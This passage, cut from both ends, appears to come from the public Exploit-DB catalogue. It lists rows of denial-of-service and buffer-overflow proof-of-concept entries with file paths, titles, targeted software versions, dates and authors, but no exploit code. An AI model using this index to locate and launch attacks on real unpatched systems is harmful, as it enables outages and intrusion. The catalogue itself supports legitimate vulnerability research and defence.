VIPER",windows,dos, -23614,exploits/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - GET Remote Denial of Service",2004-01-28,"Donato Ferrante",windows,dos, -23686,exploits/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos, -23689,exploits/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service",2004-02-12,gsicht,windows,dos, -23690,exploits/linux/dos/23690.txt,"XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow",2004-02-12,"Greg MacManus",linux,dos, -23633,exploits/windows/dos/23633.txt,"Crob FTP Server 3.5.1 - Denial of Service",2004-02-02,"Zero X",windows,dos, -23638,exploits/hardware/dos/23638.pl,"Cisco IOS 12 MSFC2 - Layer 2 Frame Denial of Service",2004-02-03,blackangels,hardware,dos, -23641,exploits/multiple/dos/23641.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service (1)",2004-02-03,"Luigi Auriemma",multiple,dos, -23642,exploits/multiple/dos/23642.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service (2)",2004-02-03,"Luigi Auriemma",multiple,dos, -23648,exploits/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos, -23654,exploits/windows/dos/23654.txt,"Xlight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos, -23656,exploits/multiple/dos/23656.txt,"Oracle 9.x - 'Database' / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos, -23660,exploits/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,windows,dos, -23662,exploits/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos, -23664,exploits/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos, -23665,exploits/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos, -23667,exploits/linux/dos/23667.txt,"ClamAV Daemon 0.65 - UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos, -23672,exploits/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Denial of Service",2004-02-09,"Bruno Morisson",hardware,dos, -23681,exploits/windows/dos/23681.pl,"EvolutionX - Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos, -23700,exploits/windows/dos/23700.txt,"ACLogic CesarFTP 0.99 - Remote Resource Exhaustion (Denial of Service)",2004-02-16,"intuit e.b.",windows,dos, -23701,exploits/windows/dos/23701.txt,"Xlight FTP Server 1.52 - Remote Send File Request Denial of Service",2004-02-16,"intuit e.b.",windows,dos, -23708,exploits/windows/dos/23708.c,"RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (1)",2004-02-16,gsicht,windows,dos, -23709,exploits/windows/dos/23709.c,"RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (2)",2004-02-16,NoRpiuS,windows,dos, -23713,exploits/windows/dos/23713.txt,"Vizer Web Server 1.9.1 - Remote Denial of Service",2004-02-17,"Donato Ferrante",windows,dos, -23715,exploits/windows/dos/23715.pl,"TransSoft Broker FTP Server 6.1 - Denial of Service",2004-02-17,SecuriTeam,windows,dos, -23716,exploits/windows/dos/23716.txt,"SmallFTPd 1.0.3 - Remote Denial of Service",2004-02-17,"intuit e.b.",windows,dos, -23731,exploits/windows/dos/23731.txt,"TYPSoft FTP Server 1.1 - Remote CPU Consumption (Denial of Service)",2004-02-20,"intuit bug_hunter",windows,dos, -23750,exploits/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Unauthenticated Remote Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos, -23752,exploits/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",windows,dos, -23755,exploits/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine - Remote Denial of Service",2004-02-24,"Luigi Auriemma",multiple,dos, -23757,exploits/linux/dos/23757.txt,"Gamespy Software Development Kit - Remote Denial of Service",2004-02-24,"Luigi Auriemma",linux,dos, -23760,exploits/windows/dos/23760.pl,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1)",2004-02-26,saintjmf,windows,dos, -23761,exploits/windows/dos/23761.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2)",2004-02-26,shaun2k2,windows,dos, -23762,exploits/windows/dos/23762.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3)",2004-02-26,shaun2k2,windows,dos, -23769,exploits/windows/dos/23769.pl,"ArGoSoft FTP Server 1.0/1.2/1.4 - Multiple Vulnerabilities",2004-02-27,"Beyond Security",windows,dos, -23778,exploits/hardware/dos/23778.c,"Motorola T720 Phone - Denial of Service",2004-03-01,"Shaun Colley",hardware,dos, -23779,exploits/linux/dos/23779.txt,"Grep < 2.11 - Integer Overflow Crash (PoC)",2012-12-31,"Joshua Rogers",linux,dos, -23780,exploits/windows/dos/23780.py,"Aktiv Player 2.80 - Crash (PoC)",2012-12-31,IndonesiaGokilTeam,windows,dos, -23786,exploits/hardware/dos/23786.c,"Nortel Wireless LAN Access Point 2200 Series - Denial of Service",2004-03-02,"Alex Hernandez",hardware,dos, -23787,exploits/multiple/dos/23787.txt,"1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow",2004-03-02,JeFFOsZ,multiple,dos, -23788,exploits/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos, -23789,exploits/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (2)",2004-03-02,shaun2k2,hardware,dos, -23793,exploits/osx/dos/23793.txt,"Apple Safari 1.x - Large JavaScript Array Handling Denial of Service",2004-03-06,kang,osx,dos, -23799,exploits/multiple/dos/23799.txt,"Epic Games Unreal Tournament Server 436.0 - Engine Remote Format String",2004-03-10,"Luigi Auriemma",multiple,dos, -23805,exploits/multiple/dos/23805.txt,"Targem Games Battle Mages 1.0 - Remote Denial of Service",2004-03-11,"Luigi Auriemma",multiple,dos, -23830,exploits/linux/dos/23830.py,"Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)",2013-01-02,xistence,linux,dos,5655 -23902,exploits/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 - UDP Datagram Handling Denial of Service",2004-03-31,"Luigi Auriemma",multiple,dos, -23839,exploits/windows/dos/23839.pl,"GlobalScape Secure FTP Server 2.0 Build 03.11.2004.2 - Site Command Remote Buffer Overflow",2004-03-17,storm,windows,dos, -23842,exploits/windows/dos/23842.pl,"WFTPD Server GUI 3.21 - Remote Denial of Service",2004-03-17,"Beyond Security",windows,dos, -23846,exploits/windows/dos/23846.txt,"Symantec Client Firewall Products 5 - 'SYMNDIS.SYS' Driver Remote Denial of Service",2004-03-18,"eEye Digital Security Team",windows,dos, -23850,exploits/windows/dos/23850.txt,"Microsoft Windows XP - 'explorer.exe' Remote Denial of Service",2004-03-19,"Rafel Ivgi The-Insider",windows,dos, -23876,exploits/hardware/dos/23876.txt,"PicoPhone Internet Phone 1.63 - Remote Buffer Overflow",2004-03-24,"Luigi Auriemma",hardware,dos, -23884,exploits/linux/dos/23884.txt,"NSTX 1.0/1.1 - Remote Denial of Service",2004-03-26,"laurent oudot",linux,dos, -23896,exploits/linux/dos/23896.txt,"MPlayer 0.9/1.0 - Remote HTTP Header Buffer Overflow",2004-03-30,blexim,linux,dos, -23900,exploits/hardware/dos/23900.txt,"CDP 0.33/0.4 - Console CD Player PrintTOC Function Buffer Overflow",2004-03-31,"Shaun Colley",hardware,dos, -23904,exploits/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 - Unauthorized Audio Stream Denial of Service",2004-03-31,"Luigi Auriemma",multiple,dos, -23911,exploits/windows/dos/23911.txt,"Microsoft Internet Explorer 6 - MSWebDVD Object Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos, -23912,exploits/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plugin - Remote Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos, -23915,exploits/windows/dos/23915.txt,"Adobe Photoshop 8.0 - COM Objects Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos, -23916,exploits/windows/dos/23916.txt,"Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos, -23917,exploits/windows/dos/23917.txt,"Panda ActiveScan 5.0 - 'ascontrol.dll' Remote Heap Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos, -23918,exploits/windows/dos/23918.txt,"Panda ActiveScan 5.0 - 'ascontrol.dll' Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos, -23919,exploits/windows/dos/23919.txt,"Symantec Security Check Virus Detection - COM Object Denial of Service",2004-04-07,"Rafel Ivgi The-Insider",windows,dos, -23920,exploits/windows/dos/23920.txt,"Mcafee FreeScan CoMcFreeScan Browser - Object Buffer Overflow",2004-04-07,"Rafel Ivgi The-Insider",windows,dos, -23923,exploits/windows/dos/23923.py,"FoxPlayer 2.9.0 - Denial of Service",2013-01-06,metacom,windows,dos, -23925,exploits/windows/dos/23925.txt,"Kerio Personal Firewall 4.0.x - Web Filtering Remote Denial of Service",2004-04-07,E.Kellinis,windows,dos, -23927,exploits/windows/dos/23927.txt,"Opera Web Browser 7.0 - Remote IFRAME Denial of Service",2004-04-08,"Pascal Notz",windows,dos, -23943,exploits/linux/dos/23943.txt,"Crackalaka IRC Server 1.0.8 - Remote Denial of Service",2004-04-09,"Donato Ferrante",linux,dos, -23944,exploits/windows/dos/23944.php,"Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow",2013-01-07,rgod,windows,dos, -23945,exploits/unix/dos/23945.txt,"Ettercap 0.7.5.1 - Stack Overflow",2013-01-07,"Sajjad Pourali",unix,dos, -23946,exploits/linux/dos/23946.c,"Linux Kernel 2.4/2.6 - Sigqueue Blocking Denial of Service",2004-04-12,"Nikita V. Youshchenko",linux,dos, -23999,exploits/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x - Format String",2004-04-14,"Thomas Wana",linux,dos, -24000,exploits/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 - MIME Message Nesting Denial of Service",2004-04-14,"Paul Szabo",windows,dos, -24002,exploits/windows/dos/24002.py,"Microsoft Outlook Express 6.0 - Remote Denial of Service",2004-04-14,"Ben Rampling",windows,dos, -24010,exploits/windows/dos/24010.txt,"Real Networks Helix Universal Server 9.0.x - Denial of Service",2004-04-15,anonymous,windows,dos, -24011,exploits/multiple/dos/24011.pl,"KPhone 2.x/3.x/4.0.1 - Malformed STUN Packet Denial of Service",2004-04-08,storm,multiple,dos, -24013,exploits/multiple/dos/24013.txt,"Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service",2004-04-17,"K. K. Mookhey",multiple,dos, -24022,exploits/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service",2013-01-10,"High-Tech Bridge SA",windows,dos, -24023,exploits/hardware/dos/24023.py,"Colloquy 1.3.5/1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos, -24029,exploits/windows/dos/24029.pl,"RhinoSoft Serv-U FTP Server 3.x/4.x/5.0 - 'LIST' Buffer Overflow",2004-04-20,storm,windows,dos, -24042,exploits/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - 'YInsthelper.dll' Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos, -24051,exploits/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",windows,dos, -24066,exploits/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",multiple,dos, -24070,exploits/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",multiple,dos, -24078,exploits/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,linux,dos, -24080,exploits/windows/dos/24080.pl,"Titan FTP Server 3.0 - 'LIST' Denial of Service",2004-05-04,storm,windows,dos, -24095,exploits/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Based Buffer Overflow",2004-05-06,"Joel Eriksson",linux,dos, -24096,exploits/linux/dos/24096.pl,"Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun",2004-05-07,"Paul Szabo",linux,dos, -24103,exploits/windows/dos/24103.txt,"MailEnable Mail Server HTTPMail 1.x - Remote Heap Overflow",2004-05-09,"Behrang Fouladi",windows,dos, -24107,exploits/windows/dos/24107.pl,"EMule Web 0.42 Control Panel - Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",windows,dos, -24110,exploits/windows/dos/24110.py,"Serva 2.0.0 - DNS Server QueryName Remote Denial of Service",2013-01-14,"Julien Ahrens",windows,dos, -24111,exploits/windows/dos/24111.py,"Serva 2.0.0 - HTTP Server GET Remote Denial of Service",2013-01-14,"Julien Ahrens",windows,dos, -24112,exploits/windows/dos/24112.txt,"Microsoft Internet Explorer 6 - XML Parsing Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",windows,dos, -24119,exploits/windows/dos/24119.txt,"Microsoft Internet Explorer 5.0.1 - http-equiv Meta Tag Denial of Service",2004-05-14,"Mike Mauler",windows,dos, -24128,exploits/windows/dos/24128.txt,"ActivePerl 5.x / Cygwin 1.5.x - System Function Call Buffer Overflow",2004-05-18,"Oliver Karow",windows,dos, -24130,exploits/multiple/dos/24130.txt,"ActivePerl 5.x / Larry Wall Perl 5.x - Duplication Operator Integer Overflow",2004-05-18,"Matt Murphy",multiple,dos, -24135,exploits/windows/dos/24135.html,"Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption",2004-05-18,henkie_is_leet,windows,dos, -24142,exploits/windows/dos/24142.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,windows,dos, -24143,exploits/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos, -24144,exploits/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",windows,dos, -24145,exploits/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (1)",2004-05-25,badpack3t,windows,dos, -24146,exploits/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (2)",2004-06-02,CoolICE,windows,dos, -24147,exploits/windows/dos/24147.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (3)",2004-06-02,CoolICE,windows,dos, -24150,exploits/windows/dos/24150.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Buffer Overflow",2004-05-28,"Chintan Trivedi",windows,dos, -40399,exploits/windows/dos/40399.txt,"VMware Workstation - 'vprintproxy.exe' JPEG2000 Images Multiple Memory Corruptions",2016-09-19,"Google Security Research",windows,dos, -24170,exploits/multiple/dos/24170.txt,"Colin McRae Rally 2004 - Multiplayer Denial of Service",2004-06-04,"Luigi Auriemma",multiple,dos, -24178,exploits/windows/dos/24178.txt,"ToCA Race Driver - Multiple Remote Denial of Service Vulnerabilities",2004-06-08,"Luigi Auriemma",windows,dos, -24181,exploits/openbsd/dos/24181.sh,"OpenBSD 3.x - ISAKMPD Security Association Piggyback Delete Payload Denial of Service",2004-06-08,"Thomas Walpuski",openbsd,dos, -24195,exploits/windows/dos/24195.pl,"WinAgents TFTP Server 3.0 - Remote Buffer Overrun",2004-06-11,"Ziv Kamir",windows,dos, -24208,exploits/windows/dos/24208.c,"FreeIPS 1.0 Protected Service - Denial of Service",2004-06-14,shawnwebb@softhome.net,windows,dos, -24209,exploits/windows/dos/24209.txt,"Sygate Personal Firewall Pro 5.5 - Local Denial of Service",2004-06-14,"Tan Chew Keong",windows,dos, -24211,exploits/windows/dos/24211.txt,"Microsoft Internet Explorer 6 - HREF Save As Denial of Service",2004-06-15,"Rafel Ivgi The-Insider",windows,dos, -24222,exploits/linux/dos/24222.c,"ircd-hybrid 7.0.1 / ircd-ratbox 1.5.1/2.0 - Socket Dequeuing Denial of Service",2004-06-19,"Erik Sperling Johansen",linux,dos, -24233,exploits/freebsd/dos/24233.c,"FreeBSD 4.10/5.x - 'execve()' Unaligned Memory Access Denial of Service",2004-06-23,"Marceta Milos",freebsd,dos, -24242,exploits/multiple/dos/24242.java,"Sun Java Runtime Environment 1.4.x - Font Object Assertion Failure Denial of Service",2004-06-28,"Marc Schoenefeld",multiple,dos, -24243,exploits/unix/dos/24243.txt,"IBM Lotus Domino Server 6 - Web Access Remote Denial of Service",2004-06-30,"Andreas Klein",unix,dos, -24247,exploits/multiple/dos/24247.txt,"Easy Chat Server 1.x - Multiple Denial of Service Vulnerabilities",2004-07-02,"Donato Ferrante",multiple,dos, -24248,exploits/unix/dos/24248.txt,"IBM Websphere Caching Proxy Server 5.0 2 - Denial of Service",2004-07-02,"Leandro Meiners",unix,dos, -24267,exploits/windows/dos/24267.txt,"Microsoft Internet Explorer 6 - JavaScript Null Pointer Exception Denial of Service",2004-07-12,"Berend-Jan Wever",windows,dos, -24275,exploits/unix/dos/24275.txt,"IBM Lotus Notes 6.0/6.5 - Multiple Java Applet Vulnerabilities",2004-07-13,"Jouko Pynnonen",unix,dos, -24281,exploits/windows/dos/24281.pl,"Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service",2004-07-14,HexView,windows,dos, -24282,exploits/multiple/dos/24282.txt,"Gattaca Server 2003 - 'web.tmpl?Language' CPU Consumption (Denial of Service)",2004-07-15,dr_insane,multiple,dos, -24283,exploits/multiple/dos/24283.txt,"Gattaca Server 2003 POP3 - Denial of Service",2004-07-15,dr_insane,multiple,dos, -24288,exploits/windows/dos/24288.txt,"Symantec Norton AntiVirus 2001/2002/2003/2004 - Script Blocker Denial of Service",2004-07-16,vozzie,windows,dos, -40398,exploits/windows/dos/40398.txt,"VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow",2016-09-19,"Google Security Research",windows,dos, -24305,exploits/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,multiple,dos, -24319,exploits/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos, -24343,exploits/windows/dos/24343.txt,"MailEnable 1.1x - Content-Length Denial of Service",2004-07-30,CoolICE,windows,dos, -24344,exploits/hardware/dos/24344.txt,"U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service",2004-08-02,"Albert Puigsech Galicia",hardware,dos, -24346,exploits/linux/dos/24346.txt,"Mozilla 1.x / Netscape 7.0/7.1 - SOAP Integer Overflow",2004-08-02,zen-parse,linux,dos, -24351,exploits/multiple/dos/24351.c,"Free Web Chat Initial Release - UserManager.java Null Pointer Denial of Service",2004-08-04,"Donato Ferrante",multiple,dos, -24352,exploits/multiple/dos/24352.java,"Free Web Chat Initial Release - Connection Saturation Denial of Service",2004-08-04,"Donato Ferrante",multiple,dos, -24355,exploits/linux/dos/24355.txt,"GNU Info 4.7 - Follow XRef Buffer Overrun",2004-08-06,"Josh Martin",linux,dos, -24358,exploits/linux/dos/24358.txt,"Xine-Lib 0.99 - Remote Buffer Overflow",2004-07-08,c0ntex,linux,dos, -24360,exploits/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (1)",2004-08-09,"Juan Pablo Martinez Kuhn",linux,dos, -24362,exploits/windows/dos/24362.txt,"Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun",2004-08-11,"Paul Craig",windows,dos, -24386,exploits/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow",2004-07-20,"Matthias Bethke",multiple,dos, -24388,exploits/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server - Info Response Buffer Overflow",2004-08-20,Dimetrius,multiple,dos, -24394,exploits/multiple/dos/24394.txt,"Opera Web Browser 7.23 - JavaScript Denial of Service",2004-08-21,sourvivor,multiple,dos, -24395,exploits/windows/dos/24395.txt,"Microsoft Internet Explorer 6.0 / Firefox 0.8/0.9.x - JavaScript Denial of Service",2004-08-23,MeFakon,windows,dos, -24411,exploits/windows/dos/24411.c,"Sysinternals Regmon 6.11 - Local Denial of Service",2004-08-25,"Next Generation Security",windows,dos, -24412,exploits/windows/dos/24412.c,"RealVNC Server 4.0 - Remote Denial of Service",2004-08-25,Uz4yh4N,windows,dos, -24416,exploits/windows/dos/24416.txt,"Ipswitch WS_FTP Server 5.0.x - CD Command Malformed File Path Remote Denial of Service",2004-08-30,lion,windows,dos, -24423,exploits/multiple/dos/24423.txt,"Cerbere Proxy Server 1.2 - Long Host Header Field Remote Denial of Service",2004-09-01,"GSS IT",multiple,dos, -24426,exploits/windows/dos/24426.html,"Opera Web Browser 7.23 - Empty Embedded Object JavaScript Denial of Service",2004-09-01,Stevo,windows,dos, -24437,exploits/windows/dos/24437.py,"Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read",2013-01-29,"Debasish Mandal",windows,dos, -24448,exploits/windows/dos/24448.svg,"Opera SVG - Use-After-Free",2013-02-05,Cons0ul,windows,dos, -24450,exploits/freebsd/dos/24450.txt,"FreeBSD 9.1 - 'ftpd' Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos, -24463,exploits/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos, -24468,exploits/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos, -24511,exploits/windows/dos/24511.txt,"SAP NetWeaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos, -24474,exploits/windows/dos/24474.py,"Schneider Electric Accutech Manager - Heap Overflow (PoC)",2013-02-10,"Evren Yalçın",windows,dos, -24485,exploits/windows/dos/24485.txt,"Microsoft Windows - HWND_BROADCAST (PoC) (MS13-005)",2013-02-11,0vercl0k,windows,dos, -24486,exploits/multiple/dos/24486.txt,"Google Chrome - Silent HTTP Authentication",2013-02-11,T355,multiple,dos, -24487,exploits/linux/dos/24487.py,"cURL - Buffer Overflow",2013-02-11,Volema,linux,dos, -24556,exploits/windows/dos/24556.py,"Hanso Player 2.1.0 - '.m3u' Buffer Overflow",2013-03-01,metacom,windows,dos, -24569,exploits/linux/dos/24569.txt,"QNX PPPoEd 2.4/4.25/6.2 - Multiple Local Buffer Overrun Vulnerabilities",2004-09-03,"Julio Cesar Fort",linux,dos, -24634,exploits/windows/dos/24634.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (1)",2004-09-27,Coolio,windows,dos, -24580,exploits/windows/dos/24580.txt,"Kaspersky Internet Security 2013 - Denial of Service",2013-03-05,"Marc Heuse",windows,dos, -24586,exploits/windows/dos/24586.txt,"Gearbox Software Halo Combat Evolved 1.x - Game Server Remote Denial of Service",2004-09-09,"Luigi Auriemma",windows,dos, -24590,exploits/linux/dos/24590.txt,"Apache mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. _Alex_ Hankins",linux,dos, -24592,exploits/multiple/dos/24592.txt,"Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service",2004-09-13,@stake,multiple,dos, -24593,exploits/unix/dos/24593.txt,"QNX Photon phrelay-cfg - '-s' Overflow",2004-09-13,"Julio Cesar Fort",unix,dos, -24594,exploits/unix/dos/24594.txt,"QNX Photon phlocale - '-s' Overflow",2004-09-13,"Julio Cesar Fort",unix,dos, -24595,exploits/unix/dos/24595.txt,"QNX Photon input-cfg - '-s' Overflow",2004-09-13,"Julio Cesar Fort",unix,dos, -24596,exploits/unix/dos/24596.txt,"QNX Photon pkg-installer - '-s' Overflow",2004-09-13,"Julio Cesar Fort",unix,dos, -24597,exploits/multiple/dos/24597.txt,"Mozilla Browser 1.7.x - Non-ASCII Hostname Heap Overflow",2004-09-14,"Mats Palmgren & Gael Delalleau",multiple,dos, -24599,exploits/linux/dos/24599.txt,"CUPS 1.1.x - UDP Packet Remote Denial of Service",2004-09-15,"Alvaro Martinez Echevarria",linux,dos, -24605,exploits/windows/dos/24605.txt,"Microsoft Windows XP - 'explorer.exe .tiff' Image Denial of Service",2004-09-16,"Jason Summers",windows,dos, -24610,exploits/multiple/dos/24610.txt,"DNS4Me 3.0 - Denial of Service / Cross-Site Scripting",2004-09-17,"James Bercegay",multiple,dos, -24618,exploits/windows/dos/24618.c,"Impressions Games Lords of the Realm III - Nickname Remote Denial of Service",2004-09-20,"Luigi Auriemma",windows,dos, -24619,exploits/cgi/dos/24619.txt,"EmuLive Server4 - Authentication Bypass / Denial of Service",2004-09-21,"James Bercegay",cgi,dos, -24620,exploits/windows/dos/24620.c,"LeadMind Pop Messenger 1.60 - Illegal Character Remote Denial of Service",2004-09-21,"Luigi Auriemma",windows,dos, -24621,exploits/php/dos/24621.txt,"Pinnacle ShowCenter 1.51 - Web Interface Skin Denial of Service",2004-09-21,"Marc Ruef",php,dos, -24635,exploits/windows/dos/24635.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (2)",2004-09-27,Coolio,windows,dos, -24636,exploits/windows/dos/24636.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (3)",2004-09-27,"Ken Hollis",windows,dos, -24637,exploits/windows/dos/24637.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (4)",2004-09-27,"Ken Hollis",windows,dos, -24639,exploits/windows/dos/24639.c,"Microsoft SQL Server 7.0 - Remote Denial of Service (1)",2004-09-28,"securma massine",windows,dos, -24640,exploits/windows/dos/24640.c,"Microsoft SQL Server 7.0 - Remote Denial of Service (2)",2004-09-28,"Sebastien Tricaud",windows,dos, -24668,exploits/multiple/dos/24668.txt,"Jera Technology Flash Messaging Server 5.2 - Remote Denial of Service",2004-10-07,"Luigi Auriemma",multiple,dos, -24677,exploits/linux/dos/24677.txt,"IBM DB2 DTS To String Conversion - Denial of Service",2004-09-01,"Chris Anley",linux,dos, -24679,exploits/windows/dos/24679.txt,"IBM DB2 Semaphore Signaling - Denial of Service",2004-09-01,"Chris Anley",windows,dos, -24684,exploits/windows/dos/24684.txt,"Yak! Chat Client 2.x - FTP Server Directory Traversal",2004-10-15,"Luigi Auriemma",windows,dos, -24691,exploits/multiple/dos/24691.txt,"Vypress Tonecast 1.3 - Remote Denial of Service",2004-10-19,"Luigi Auriemma",multiple,dos, -24696,exploits/linux/dos/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote (PoC)",2004-11-21,"Richard Hart",linux,dos, -24699,exploits/windows/dos/24699.txt,"Microsoft Windows XP - '.WAV' File Handler Denial of Service",2004-10-22,HexView,windows,dos, -24705,exploits/windows/dos/24705.txt,"Microsoft Internet Explorer 6 - Font Tag Denial of Service",2004-10-26,"Jehiah Czebotar",windows,dos, -24708,exploits/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos, -24710,exploits/multiple/dos/24710.txt,"ID Software Quake II Server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos, -24715,exploits/multiple/dos/24715.txt,"Caudium 1.x - Remote Denial of Service",2004-10-30,"David Gourdelier",multiple,dos, -24726,exploits/windows/dos/24726.txt,"Software602 602 LAN Suite - Multiple Remote Denial of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",windows,dos, -24733,exploits/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service",2004-11-12,"Luigi Auriemma",windows,dos, -24738,exploits/windows/dos/24738.c,"AlShare Software NetNote Server 2.2 - Remote Denial of Service",2004-11-13,class101,windows,dos, -24741,exploits/windows/dos/24741.txt,"TagScanner 5.1 - Stack Buffer Overflow",2013-03-13,Vulnerability-Lab,windows,dos, -24743,exploits/windows/dos/24743.txt,"Cam2pc 4.6.2 - '.BMP' Image Processing Integer Overflow",2013-03-13,coolkaveh,windows,dos, -24747,exploits/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos, -24755,exploits/linux/dos/24755.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos, -24756,exploits/linux/dos/24756.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",linux,dos, -24761,exploits/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x - Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",multiple,dos, -24763,exploits/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction 